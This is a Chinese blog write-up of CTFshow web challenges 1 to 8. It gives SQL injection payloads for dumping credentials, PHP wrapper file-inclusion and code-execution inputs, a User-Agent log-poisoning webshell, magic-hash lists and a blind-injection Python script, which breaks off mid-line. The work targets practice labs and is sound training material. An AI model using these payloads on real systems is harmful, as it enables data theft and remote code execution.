<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>CTFshow | Six_plum</title><meta name="author" content="Six_plum"><meta name="copyright" content="Six_plum"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="CTFshowweb1简单签到 web2（简单sql注入）简单的sql注入，按照步骤来 123456789假设题目的要求是拿到所有的username和password的值id&#x3D;1 order by 1--+       #这里是查看列的数量id&#x3D;0 union select 1,2,3--+   #查看显示位假设显示位仅有3，那么可以在3处去注入获取想要的信息，如：id&#x3D;0 union selec">
<meta property="og:type" content="article">
<meta property="og:title" content="CTFshow">
<meta property="og:url" content="https://hshdgyq.github.io/2023/06/04/CTFshow/index.html">
<meta property="og:site_name" content="Six_plum">
<meta property="og:description" content="CTFshowweb1简单签到 web2（简单sql注入）简单的sql注入，按照步骤来 123456789假设题目的要求是拿到所有的username和password的值id&#x3D;1 order by 1--+       #这里是查看列的数量id&#x3D;0 union select 1,2,3--+   #查看显示位假设显示位仅有3，那么可以在3处去注入获取想要的信息，如：id&#x3D;0 union selec">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hshdgyq.github.io/img/ctfshow.gif">
<meta property="article:published_time" content="2023-06-04T14:37:53.000Z">
<meta property="article:modified_time" content="2023-09-22T14:53:39.291Z">
<meta property="article:author" content="Six_plum">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hshdgyq.github.io/img/ctfshow.gif"><link rel="shortcut icon" href="/img/upper.jpg"><link rel="canonical" href="https://hshdgyq.github.io/2023/06/04/CTFshow/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: true,
    post: true
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'CTFshow',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-09-22 22:53:39'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom.css"><meta name="generator" content="Hexo 6.3.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/header.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">26</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">5</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/ctfshow.gif')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Six_plum</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">CTFshow</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2023-06-04T14:37:53.000Z" title="发表于 2023-06-04 22:37:53">2023-06-04</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2023-09-22T14:53:39.291Z" title="更新于 2023-09-22 22:53:39">2023-09-22</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/web/">web</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="CTFshow"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="CTFshow"><a href="#CTFshow" class="headerlink" title="CTFshow"></a>CTFshow</h1><h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><p>简单签到</p>
<h2 id="web2（简单sql注入）"><a href="#web2（简单sql注入）" class="headerlink" title="web2（简单sql注入）"></a>web2（简单sql注入）</h2><p>简单的sql注入，按照步骤来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">假设题目的要求是拿到所有的username和password的值</span><br><span class="line">id=1 order by 1--+       #这里是查看列的数量</span><br><span class="line">id=0 union select 1,2,3--+   #查看显示位</span><br><span class="line">假设显示位仅有3，那么可以在3处去注入获取想要的信息，如：</span><br><span class="line">id=0 union select 1,2,database()--+   #查看数据库名称,假设查找到的数据库名为mysql</span><br><span class="line">id=0 union select 1,2,version()--+    #查看数据库版本信息</span><br><span class="line">id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;mysql&#x27;--+   #查找mysql数据库中所有的表名，group_concat()函数的作用是将所有查找到的项都连接起来，否则只能查到一个,假设查到重要的表为users</span><br><span class="line">id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+    #查到users表中所有字段即列的名字,假设查到列中有username和password</span><br><span class="line">id=0 union select 1,2,group_concat(username,password) from users      #从users这个表中获取到所有的username和password的值</span><br></pre></td></tr></table></figure>

<h2 id="web3（PHP伪协议）"><a href="#web3（PHP伪协议）" class="headerlink" title="web3（PHP伪协议）"></a>web3（PHP伪协议）</h2><p>先了解什么是<a target="_blank" rel="noopener" href="https://blog.csdn.net/cosmoslin/article/details/120695429">PHP伪协议</a></p>
<p>关键源码泄露：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php include($_GET[&#x27;url&#x27;]);?&gt; </span><br></pre></td></tr></table></figure>

<p>这是一个文件包含的操作，通过参数url可以进行操作，首先利用php:&#x2F;&#x2F;filter读去文件源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>

<p>将得到的base64拿去解密：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$url=$_GET[&#x27;url&#x27;];</span><br><span class="line">if(isset($url))&#123;</span><br><span class="line">    include($url);</span><br><span class="line">&#125;</span><br><span class="line">    </span><br><span class="line">?&gt;</span><br><span class="line">&lt;html lang=&quot;zh-CN&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot; /&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0&quot; /&gt;</span><br><span class="line">    &lt;title&gt;ctf.show_web3&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;center&gt;</span><br><span class="line">    &lt;h2&gt;ctf.show_web3&lt;/h2&gt;</span><br><span class="line">    &lt;hr&gt;</span><br><span class="line">    &lt;h3&gt;</span><br><span class="line">    &lt;?php</span><br><span class="line">            </span><br><span class="line">            $code=&quot;&lt;?php include($&quot;.&quot;_GET[&#x27;url&#x27;]);?&gt;&quot;;</span><br><span class="line">            highlight_string($code);</span><br><span class="line">    ?&gt;</span><br><span class="line">    &lt;/center&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>没什么用的代码，直接进行命令执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php://input</span><br><span class="line">&lt;?php system(&#x27;ls&#x27;);?&gt;  #post方式传递</span><br></pre></td></tr></table></figure>

<p>此时会提示一个ctf_go_go_go的文件，访问这个文件，得到flag</p>
<h2 id="web4（日志UA注入）"><a href="#web4（日志UA注入）" class="headerlink" title="web4（日志UA注入）"></a>web4（日志UA注入）</h2><p>看到get方式的url参数，像web3一样直接用php伪协议发现报错，学习了别人的博客，说是日志注入，F12发现是nginx服务器，查看了nginx服务器的日志存放，发现是在&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log，然后访问这个文件，看到了日志：</p>
<p><img src="/2023/06/04/CTFshow/web4_1.png"></p>
<p>然后这里发现爆出的是UA，那么猜测是UA注入，用burp抓包，在抓的包UA后面添上一句话木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_POST[&#x27;pass&#x27;]);?&gt;</span><br></pre></td></tr></table></figure>

<p>重发包得到flag。</p>
<h2 id="web5（md5弱比较）"><a href="#web5（md5弱比较）" class="headerlink" title="web5（md5弱比较）"></a>web5（md5弱比较）</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">        <span class="variable">$flag</span>=<span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="variable">$v1</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">        <span class="variable">$v2</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$v1</span>) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">ctype_alpha</span>(<span class="variable">$v1</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;v1 error&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">is_numeric</span>(<span class="variable">$v2</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;v2 error&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$v1</span>)==<span class="title function_ invoke__">md5</span>(<span class="variable">$v2</span>))&#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;where is flag?&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>ctype_alpha函数判断参数是否全为字母，is_numeric函数判断参数是否全为数字。</p>
<p>后面进行md5值的比较，两个md5如果都是以0e加数字组成，那么输入值就为0</p>
<p>常见的输入值为0的md5:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br></pre></td><td class="code"><pre><span class="line">纯大写字母：</span><br><span class="line">QNKCDZO</span><br><span class="line">0e830400451993494058024219903391</span><br><span class="line">QLTHNDT 0e405967825401955372549139051580</span><br><span class="line">QNKCDZO 0e830400451993494058024219903391</span><br><span class="line">EEIZDOI 0e782601363539291779881938479162</span><br><span class="line">TUFEPMC 0e839407194569345277863905212547</span><br><span class="line">UTIPEZQ 0e382098788231234954670291303879</span><br><span class="line">UYXFLOI 0e552539585246568817348686838809</span><br><span class="line">IHKFRNS 0e256160682445802696926137988570</span><br><span class="line">PJNPDWY 0e291529052894702774557631701704</span><br><span class="line">ABJIHVY 0e755264355178451322893275696586</span><br><span class="line">DQWRASX 0e742373665639232907775599582643</span><br><span class="line">DYAXWCA 0e424759758842488633464374063001</span><br><span class="line">GEGHBXL 0e248776895502908863709684713578</span><br><span class="line">GGHMVOE 0e362766013028313274586933780773</span><br><span class="line">GZECLQZ 0e537612333747236407713628225676</span><br><span class="line">NWWKITQ 0e763082070976038347657360817689</span><br><span class="line">NOOPCJF 0e818888003657176127862245791911</span><br><span class="line">MAUXXQC 0e478478466848439040434801845361</span><br><span class="line">MMHUWUV 0e701732711630150438129209816536</span><br><span class="line">纯数字：</span><br><span class="line">240610708</span><br><span class="line">0e462097431906509019562988736854</span><br><span class="line">240610708 0e462097431906509019562988736854</span><br><span class="line">314282422 0e990995504821699494520356953734</span><br><span class="line">571579406 0e972379832854295224118025748221</span><br><span class="line">903251147 0e174510503823932942361353209384</span><br><span class="line">1110242161 0e435874558488625891324861198103</span><br><span class="line">1320830526 0e912095958985483346995414060832</span><br><span class="line">1586264293 0e622743671155995737639662718498</span><br><span class="line">2302756269 0e250566888497473798724426794462</span><br><span class="line">2427435592 0e067696952328669732475498472343</span><br><span class="line">2653531602 0e877487522341544758028810610885</span><br><span class="line">3293867441 0e471001201303602543921144570260</span><br><span class="line">3295421201 0e703870333002232681239618856220</span><br><span class="line">3465814713 0e258631645650999664521705537122</span><br><span class="line">3524854780 0e507419062489887827087815735195</span><br><span class="line">3908336290 0e807624498959190415881248245271</span><br><span class="line">4011627063 0e485805687034439905938362701775</span><br><span class="line">4775635065 0e998212089946640967599450361168</span><br><span class="line">4790555361 0e643442214660994430134492464512</span><br><span class="line">5432453531 0e512318699085881630861890526097</span><br><span class="line">5579679820 0e877622011730221803461740184915</span><br><span class="line">5585393579 0e664357355382305805992765337023</span><br><span class="line">6376552501 0e165886706997482187870215578015</span><br><span class="line">7124129977 0e500007361044747804682122060876</span><br><span class="line">7197546197 0e915188576072469101457315675502</span><br><span class="line">7656486157 0e451569119711843337267091732412</span><br><span class="line">其他：</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1184209335a</span><br><span class="line">0e072485820392773389523109082030</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s155964671a</span><br><span class="line">0e342768416822451524974117254469</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s532378020a</span><br><span class="line">0e220463095855511507588041205815</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s214587387a</span><br><span class="line">0e848240448830537924465865611904</span><br><span class="line">s1502113478a</span><br><span class="line">0e861580163291561247404381396064</span><br><span class="line">s1091221200a</span><br><span class="line">0e940624217856561557816327384675</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s1885207154a</span><br><span class="line">0e509367213418206700842008763514</span><br><span class="line">s1836677006a</span><br><span class="line">0e481036490867661113260034900752</span><br><span class="line">s1665632922a</span><br><span class="line">0e731198061491163073197128363787</span><br><span class="line">s878926199a</span><br><span class="line">0e545993274517709034328855841020</span><br></pre></td></tr></table></figure>

<p>常见的输入值为0的sha1:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">10932435112</span><br><span class="line">0e07766915004133176347055865026311692244</span><br><span class="line">aaroZmOk</span><br><span class="line">0e66507019969427134894567494305185566735</span><br><span class="line">aaK1STfY</span><br><span class="line">0e76658526655756207688271159624026011393</span><br><span class="line">aaO8zKZF</span><br><span class="line">0e89257456677279068558073954252716165668</span><br><span class="line">aa3OFF9m</span><br><span class="line">0e36977786278517984959260394024281014729</span><br><span class="line">0e1290633704</span><br><span class="line">0e19985187802402577070739524195726831799</span><br></pre></td></tr></table></figure>

<p>按要求将v1和v2传入即可。</p>
<h2 id="web6（sql注入空格绕过post）"><a href="#web6（sql注入空格绕过post）" class="headerlink" title="web6（sql注入空格绕过post）"></a>web6（sql注入空格绕过post）</h2><p>进入页面，发现是用户登录页面，先尝试SQL注入，在输入万能的SQL语句1’ or1&#x3D;1#后发现报错，burp抓包发现空格被过滤了，直接用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/**/</span><br></pre></td></tr></table></figure>

<p>代替空格就行，当然还有另外常见的绕过空格的方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">()</span><br><span class="line">回车   //url编码中的%0a</span><br><span class="line">`     //tab键上面的那个键</span><br><span class="line">tap</span><br><span class="line">两个空格</span><br></pre></td></tr></table></figure>

<p>绕过了空格之后就是常规的操作了，查显示位，查数据库，查表，查字段。</p>
<h2 id="web7（sql注入空格绕过get）"><a href="#web7（sql注入空格绕过get）" class="headerlink" title="web7（sql注入空格绕过get）"></a>web7（sql注入空格绕过get）</h2><p>进入页面看见了几个目录，发现是文章，先用目录扫描工具扫了一下，发现的目录访问后没啥用，点击文章后发现有?id&#x3D;1，这里大胆猜测时SQL注入，写一个万能SQL语句，发现报错，抓包后没发现什么问题，慢慢试，发现依然是一个空格绕过，老套路操作就行。</p>
<h2 id="web8（sql注入过滤了空格、union、and、逗号，报错注入）"><a href="#web8（sql注入过滤了空格、union、and、逗号，报错注入）" class="headerlink" title="web8（sql注入过滤了空格、union、and、逗号，报错注入）"></a>web8（sql注入过滤了空格、union、and、逗号，报错注入）</h2><p>试了很久，我只发现了这道题过滤了空格，然后and也过滤了，但是union、逗号、和select我不知道怎么确定，看了大佬的wp通过报错注入一点一点试，就可以发现逗号被过滤了，select没有被过滤，再进行联合注入，就可以发现union也被过滤了。注入正确返回页面，错误就没啥反应，这里就直接用大佬的脚本吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"> </span><br><span class="line">url = <span class="string">&#x27;http://6a8bc7d0-0e78-4a6f-814a-2fd51d247a9e.challenge.ctf.show/index.php?id=0/**/or/**/&#x27;</span></span><br><span class="line">name = <span class="string">&#x27;&#x27;</span></span><br><span class="line"> </span><br><span class="line"><span class="comment"># 循环45次( 循环次数按照返回的字符串长度自定义)</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">50</span>):</span><br><span class="line">    <span class="comment"># 获取当前使用的数据库</span></span><br><span class="line">    <span class="comment"># payload = &#x27;ascii(substr(database()from/**/%d/**/for/**/1))=%d&#x27;</span></span><br><span class="line">    <span class="comment"># 获取当前数据库的所有表</span></span><br><span class="line">    <span class="comment"># payload = &#x27;ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d&#x27;</span></span><br><span class="line">    <span class="comment"># 获取flag表的字段</span></span><br><span class="line">    <span class="comment"># payload = &#x27;ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d&#x27;</span></span><br><span class="line">    <span class="comment"># 获取flag表的数据</span></span><br><span class="line">    payload = <span class="string">&#x27;ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d&#x27;</span></span><br><span class="line">    count = <span class="number">0</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;正在获取第 %d 个字符&#x27;</span> % i)</span><br><span class="line">    <span class="comment"># 截取SQL查询结果的每个字符, 并判断字符内容，截取31到128以保证每个可能的flag字符都包含</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">31</span>, <span class="number">128</span>):</span><br><span class="line">        result = requests.get(url + payload % (i, j))</span><br><span class="line"> </span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;If&#x27;</span> <span class="keyword">in</span> result.text:</span><br><span class="line">            name 